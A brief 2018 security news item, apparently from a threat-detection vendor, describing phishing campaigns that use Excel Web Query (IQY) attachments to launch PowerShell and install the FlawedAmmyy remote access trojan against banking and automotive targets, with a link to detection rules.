Delaware, USA – October 8, 2018 — Adversaries are constantly looking for new ways to infect the victim’s system, and now the Excel Web Query file (IQY) has attracted their attention, which has been used in recent campaigns to spread FlawedAmmyy RAT. Last month, attackers distributed multi-platform Adwind malware via malicious Excel documents with .CSV or .XLT extensions. IQY files are used to download data from the internet directly into Excel; they contain URL and several other parameters needed to make queries over the Internet. Adversaries targeted at the banking sector and automotive industries, they send phishing emails with IQY or PDF files attached. PDFs used in these campaigns have embedded IQY file. If a user opens the malicious attachment, it runs PowerShell processes and executes the script that downloads a string from URL and executes it using IEX parameter. The next PowerShell script downloads and executes the FlawedAmmyy RAT that allows attackers to take over the infected computer, manages the files and make screenshots.
This is the first time of leveraging IQY files in a major spam campaign in the wild. As a result, and because IQY files have legitimate use cases, they bypass most filters and antivirus tools. The ability of these files to open Excel and (if users choose to ignore warnings) download any data from the Internet makes them extremely dangerous. To detect FlawedAmmyy RAT, you can use your existing security solutions and free SIEM rules from Threat Detection Marketplace: https://tdm.socprime.com/sigma/generate/swIC1WMBqfpvXJhTewwE/